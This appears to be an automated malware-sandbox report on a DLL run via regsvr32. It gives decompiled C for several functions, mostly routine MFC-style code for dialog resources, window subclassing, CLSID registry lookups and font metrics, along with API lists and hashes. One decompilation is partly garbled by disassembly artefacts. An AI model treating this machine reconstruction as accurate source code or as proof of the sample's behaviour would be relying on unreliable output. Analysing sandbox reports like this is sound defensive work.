String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-2424895508
Opcode ID: 13cae8bc9827f3ed2ee9d65c789eb52e5daba88252a32ef3fd7582a7348d6315
Instruction ID: 0cd57485817c8c7c4c622c9ee6dfae91d492b28f6457f0633034de1c6d42f173
Opcode Fuzzy Hash: 13cae8bc9827f3ed2ee9d65c789eb52e5daba88252a32ef3fd7582a7348d6315
Instruction Fuzzy Hash: 05F0DFBCD0422AEEEB10FB719DC8CC9BEA4EB053447024667E91892260F7349480AE92

Uniqueness

Uniqueness Score: -1.00%

Function 1001BE13 Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1001BE13(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E10047680(0x1008f04f, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1001E302(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E1001E302(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E1001B932(_t84, _t100, __eflags);
					E10014092(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = L10012730();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E1001795E(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E10017979(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E1001628E(_t96, __eflags, _t100);
					_t58 = E10013FEA(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E1001BC23(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E100177F8(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E10013B72(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E10017C59(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E10017979(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E1001B96C(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E10047725(_t63);
				}
			}

0x1001be13
0x1001be13
0x1001be13
0x1001be1a
0x1001be1f
0x1001be21
0x1001be27
0x1001be2d
0x1001be30
0x1001be35
0x1001be38
0x1001be3a
0x1001be3d
0x1001be44
0x1001be55
0x1001be5b
0x1001be5b
0x1001be61
0x1001be66
0x1001be6c
0x1001be6c
0x1001be72
0x1001be7c
0x1001be83
0x1001be86
0x1001be8b
0x1001be8e
0x1001be91
0x1001be94
0x1001be97
0x1001be9f
0x1001bea2
0x1001bead
0x1001beaf
0x1001beb6
0x1001bebc
0x1001bec8
0x1001beca
0x1001becc
0x1001becf
0x1001bed3
0x1001bedb
0x1001bedd
0x1001bedf
0x1001bee6
0x1001bee8
0x1001beec
0x1001beee
0x1001bef3
0x1001bef3
0x1001bee8
0x1001bedd
0x1001becf
0x1001beaf
0x1001bea2
0x1001befa
0x1001beff
0x1001bf07
0x1001bf0c
0x1001bf0d
0x1001bf0e
0x1001bf13
0x1001bf18
0x1001bf1a
0x1001bf1c
0x1001bf1e
0x1001bf22
0x1001bf26
0x1001bf29
0x1001bf2e
0x1001bf32
0x1001bf36
0x1001bf36
0x1001bf3a
0x1001bf3f
0x1001bf3f
0x1001bf3f
0x1001bf41
0x1001bf44
0x1001bf52
0x1001bf52
0x1001bf44
0x1001bf57
0x1001bf7a
0x1001bf7d
0x1001bf83
0x1001bf83
0x1001bf88
0x1001bf8b
0x1001bf92
0x1001bf92
0x1001bf98
0x1001bf9b
0x1001bfa3
0x1001bfa6
0x1001bfab
0x1001bfab
0x1001bfa6
0x1001bfb5
0x1001bfba
0x1001bfbf
0x1001bfc2
0x1001bfc7
0x1001bfc7
0x1001bfcd
0x00000000
0x1001be74
0x1001be74
0x1001bfd0
0x1001bfd5
0x1001bfd5

APIs

__EH_prolog3_catch.LIBCMT ref: 1001BE1A
FindResourceA.KERNEL32 ref: 1001BE4D
LoadResource.KERNEL32(?,00000000), ref: 1001BE55
LockResource.KERNEL32(?,00000024,10002FE0,0000035C), ref: 1001BE66
GetDesktopWindow.USER32 ref: 1001BE99
IsWindowEnabled.USER32(?), ref: 1001BEA7
EnableWindow.USER32(?,00000000), ref: 1001BEB6

Part of subcall function 1001795E: IsWindowEnabled.USER32(?), ref: 10017967

Part of subcall function 10017979: EnableWindow.USER32(?,?), ref: 10017986

EnableWindow.USER32(?,00000001), ref: 1001BF92
GetActiveWindow.USER32 ref: 1001BF9D
SetActiveWindow.USER32(?), ref: 1001BFAB
FreeResource.KERNEL32(?,?,00000024,10002FE0,0000035C), ref: 1001BFC7

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: d34204b40df7c202cc3224c9b72ec68b61058b99a552d90991c186c7926b9ed6
Instruction ID: 396292340296106368fb6444aaf32842fcf05ff203fa84e718e3a48a4a1359f2
Opcode Fuzzy Hash: d34204b40df7c202cc3224c9b72ec68b61058b99a552d90991c186c7926b9ed6
Instruction Fuzzy Hash: AB518B34A00B05CBDB11DFA5CD896AEBBF1FF48742F11006DE642AA2A1CB75D982CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10015EF7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10015EF7(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E10047680(0x1008ea63, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E10013FEA(1, _t60, _t71,  *(_t71 + 0x14));
					E10015E0B(_t60, E10013FEA(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E10015E81(1, _t66, E10013FEA(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								L10012935(E10013FEA(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								L1001485E(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E10047725( *(_t71 - 0x14));
			}

0x10015ef7
0x10015ef7
0x10015ef7
0x10015efe
0x10015f03
0x10015f06
0x10015f0d
0x10015f13
0x10015f17
0x10015f1b
0x10015f23
0x10015f24
0x10015f27
0x10015fd0
0x10015fe2
0x00000000
0x10015f2d
0x10015f2d
0x10015f30
0x10015fc8
0x10015fe7
0x10015fe9
0x00000000
0x00000000
0x10015f32
0x10015f32
0x10015f35
0x10015f8e
0x10015f96
0x10015fa4
0x00000000
0x10015f37
0x10015f3c
0x10015feb
0x10015ffe
0x10015f42
0x10015f53
0x10015f70
0x10015f78
0x10015f78
0x10015f3c
0x10015f35
0x10015f30
0x10015f85

APIs

__EH_prolog3_catch.LIBCMT ref: 10015EFE
GetPropA.USER32(?,AfxOldWndProc423), ref: 10015F0D
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 10015F67

Part of subcall function 1001485E: GetWindowRect.USER32 ref: 10014886
Part of subcall function 1001485E: GetWindow.USER32(?,00000004), ref: 100148A3

SetWindowLongA.USER32 ref: 10015F8E
RemovePropA.USER32(?,AfxOldWndProc423), ref: 10015F96
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 10015F9D
GlobalDeleteAtom.KERNEL32(00000000), ref: 10015FA4

Part of subcall function 10012935: GetWindowRect.USER32 ref: 10012941

CallWindowProcA.USER32(?,?,?,?,00000000), ref: 10015FF8

Strings

AfxOldWndProc423, xrefs: 10015F06, 10015F0B, 10015F94, 10015F9C

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 424c9e9bce70c90c35348e3e81b1569fcdc2e45d665c4bac450301485fc4696e
Instruction ID: febc920c58330b31607bc6e03b2d61de395114b009de471acd785bc6be4fc9a9
Opcode Fuzzy Hash: 424c9e9bce70c90c35348e3e81b1569fcdc2e45d665c4bac450301485fc4696e
Instruction Fuzzy Hash: 7031413680011AEBDF01DFA0CD8ADEF7AB8FF49351F054528F601AA0A1D736D952DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 100296A0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E100296A0(void* __ebx, signed int __edi, void* __esi, void* _a4, intOrPtr _a8) {
				signed int _v3;
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				intOrPtr _v117;
				signed int _t38;
				signed int _t46;
				int* _t51;

				asm("fisttp dword [ecx]");
				asm("adc [ebx-0x167cefb7], cl");
				asm("adc cl, ch");
				_t46 = __edi ^ _v3;
				_v117();
				_push(_t46);
				_t51 = 0;
				_v12 = 0;
				_v20 = L100011F4(_a8, 0x104);
				_v16 = 0x104;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t38 = RegQueryValueExA(_a4, 0x1009c448, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t51 =  ~_t38 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
				}
				E1000FED3(_a8, 0xffffffff);
				return _t51;
			}

0x100296a2
0x100296a4
0x100296aa
0x100296ac
0x100296af
0x100296ba
0x100296c0
0x100296c3
0x100296cb
0x100296d7
0x100296e5
0x100296ec
0x100296f6
0x10029706
0x10029714
0x1002971b
0x10029731
0x1002973e
0x10029740
0x10029741
0x10029741
0x10029746
0x10029746
0x1002974b
0x1002974d
0x10029753
0x1002975d

APIs

RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 100296E8
RegOpenKeyA.ADVAPI32(?,?,?), ref: 100296FC
RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 10029717
RegQueryValueExA.ADVAPI32 ref: 10029731
RegCloseKey.ADVAPI32(?), ref: 10029741
RegCloseKey.ADVAPI32(?), ref: 10029746
RegCloseKey.ADVAPI32(?), ref: 1002974B

Strings

CLSID, xrefs: 100296D2
InProcServer32, xrefs: 1002970C

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseOpen$QueryValue
String ID: CLSID$InProcServer32
API String ID: 3523390698-323508013
Opcode ID: 3578df34caa4d2e3dfa6c351421b129961d0aa4c243a6a38072af882a56ef9e0
Instruction ID: f2a30076464bdd38d6fdb78a992d83e2900a030fe08d717353393a64dc1c7679
Opcode Fuzzy Hash: 3578df34caa4d2e3dfa6c351421b129961d0aa4c243a6a38072af882a56ef9e0
Instruction Fuzzy Hash: 9A212772900169BFDF01EFA9CD80CEEBFB9EF456A4F1041A6F909A6120D7319B41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 100296B0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E100296B0(void* __ebx, void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				signed int _t35;
				int* _t44;

				_t44 = 0;
				_v12 = 0;
				_v20 = L100011F4(_a8, 0x104);
				_v16 = 0x104;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t35 = RegQueryValueExA(_a4, 0x1009c448, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t44 =  ~_t35 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
				}
				E1000FED3(_a8, 0xffffffff);
				return _t44;
			}

0x100296c0
0x100296c3
0x100296cb
0x100296d7
0x100296e5
0x100296ec
0x100296f6
0x10029706
0x10029714
0x1002971b
0x10029731
0x1002973e
0x10029740
0x10029741
0x10029741
0x10029746
0x10029746
0x1002974b
0x1002974d
0x10029753
0x1002975d

APIs

RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 100296E8
RegOpenKeyA.ADVAPI32(?,?,?), ref: 100296FC
RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 10029717
RegQueryValueExA.ADVAPI32 ref: 10029731
RegCloseKey.ADVAPI32(?), ref: 10029741
RegCloseKey.ADVAPI32(?), ref: 10029746
RegCloseKey.ADVAPI32(?), ref: 1002974B

Strings

CLSID, xrefs: 100296D2
InProcServer32, xrefs: 1002970C

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseOpen$QueryValue
String ID: CLSID$InProcServer32
API String ID: 3523390698-323508013
Opcode ID: 81f69cb689f6843a058716a6a0feb26e352c496ef2f3606f2c0e3d5cf5593caa
Instruction ID: 31e1e874dfacf024a2a9f9362d9fa2cdaf9cb0843e2b98def9e3b85b75eacc03
Opcode Fuzzy Hash: 81f69cb689f6843a058716a6a0feb26e352c496ef2f3606f2c0e3d5cf5593caa
Instruction Fuzzy Hash: 421137B690012DBBDF01EF99CD80CEEBFB9EF456A4F104166F919A6120D7319B41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1003DBEC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1003DBEC() {
				struct HWND__* _v4;
				void* _v68;
				void* _v76;
				int _t4;
				int _t10;
				struct HDC__* _t15;
				void* _t18;

				_t4 =  *0x100b9b14; // 0xffffffff
				if(_t4 == 0xffffffff) {
					_t15 = GetDC(0);
					_v4 = 0;
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_v68 = SelectObject(_t15, _t18);
					}
					GetCharWidthA(_t15, 0x36, 0x36, 0x100b9b14);
					if(_t18 != 0) {
						SelectObject(_t15, _v76);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t15);
					_t10 =  *0x100b9b14; // 0xffffffff
					return _t10;
				}
				return _t4;
			}

0x1003dbed
0x1003dbf5
0x1003dc1c
0x1003dc1e
0x1003dc35
0x1003dc39
0x1003dc3f
0x1003dc3f
0x1003dc4d
0x1003dc55
0x1003dc5c
0x1003dc5f
0x1003dc5f
0x1003dc67
0x1003dc6d
0x00000000
0x1003dc75
0x1003dc77

APIs

GetDC.USER32(00000000), ref: 1003DBFE
GetSystemMetrics.USER32 ref: 1003DC22
CreateFontA.GDI32(00000000,?,?,?,?,?,1003F0E1,00001000,?,?,?,?,?,?), ref: 1003DC29
SelectObject.GDI32(00000000,00000000), ref: 1003DC3D
GetCharWidthA.GDI32(00000000,00000036,00000036,100B9B14), ref: 1003DC4D
SelectObject.GDI32(00000000,?), ref: 1003DC5C
DeleteObject.GDI32(00000000), ref: 1003DC5F
ReleaseDC.USER32(00000000,00000000), ref: 1003DC67

Strings

Marlett, xrefs: 1003DC04

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: f143f9938d41884723be5508dee54b535352d4842ea16944978db2463053da02
Instruction ID: 500abb4394048999830c117a5cab8b51610c075c4a3b407bf1c48366689c28be
Opcode Fuzzy Hash: f143f9938d41884723be5508dee54b535352d4842ea16944978db2463053da02
Instruction Fuzzy Hash: 3A014C716523307BE2229B669E8CDDB3E6DEF87AE1F000545F20AA2190CB655900C6B4

Uniqueness

Uniqueness Score: -1.00%

Function 1000A4C7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E1000A4C7(void* __ecx, char* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void* _v12;
				void* _t27;
				void* _t28;
				char* _t30;
				void* _t31;
				intOrPtr* _t32;

				_t32 = __imp__CoTreatAsClass;
				_t28 =  *_t32(_a8, _a12, _t27, _t31, __ecx, __ecx);
				if(_t28 != 0 && _a4 != 0) {
					RegOpenKeyA(0x80000000, "CLSID",  &_v12);
					_v8 = _v8 & 0x00000000;
					__imp__StringFromCLSID(_a8,  &_v8);
					_t30 = L10020CCA(_v8);
					RegSetValueA(_v12, _t30, 1, _a4, lstrlenA(_a4));
					__imp__CoTaskMemFree(_t30);
					_t28 =  *_t32(_a8, _a12);
					RegCloseKey(_v12);
				}
				return _t28;
			}

0x1000a4cd
0x1000a4dc
0x1000a4e0
0x1000a4f6
0x1000a4fc
0x1000a507
0x1000a518
0x1000a52a
0x1000a531
0x1000a542
0x1000a544
0x1000a544
0x1000a54f

APIs

CoTreatAsClass.OLE32(?,?), ref: 1000A4DA
RegOpenKeyA.ADVAPI32(80000000,CLSID,00000000), ref: 1000A4F6
StringFromCLSID.OLE32(?,00000000), ref: 1000A507

Part of subcall function 10020CCA: CoTaskMemFree.OLE32(00000000), ref: 10020CDB

lstrlenA.KERNEL32(00000000,00000000), ref: 1000A51A
RegSetValueA.ADVAPI32(00000000,00000000,00000001,00000000,00000000), ref: 1000A52A
CoTaskMemFree.OLE32(00000000), ref: 1000A531
CoTreatAsClass.OLE32(?,?), ref: 1000A53D
RegCloseKey.ADVAPI32(00000000), ref: 1000A544

Strings

CLSID, xrefs: 1000A4EC

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ClassFreeTaskTreat$CloseFromOpenStringValuelstrlen
String ID: CLSID
API String ID: 2259541326-910414637
Opcode ID: 0fb55bce5508f47ccc40d3211df9bbc4f2d4a9c6eba1e501c85bd7d66b1ff4b6
Instruction ID: 64bae599c37c4c486c8a5bfdd2905429fbca63f959f3cca092693e514ca3cc27
Opcode Fuzzy Hash: 0fb55bce5508f47ccc40d3211df9bbc4f2d4a9c6eba1e501c85bd7d66b1ff4b6
Instruction Fuzzy Hash: 7101E976400118FBEF029FA0CD49EEE7FBAEB8A366F104155FA0592120DB719AA4DB50

Uniqueness

Uniqueness Score: -1.00%

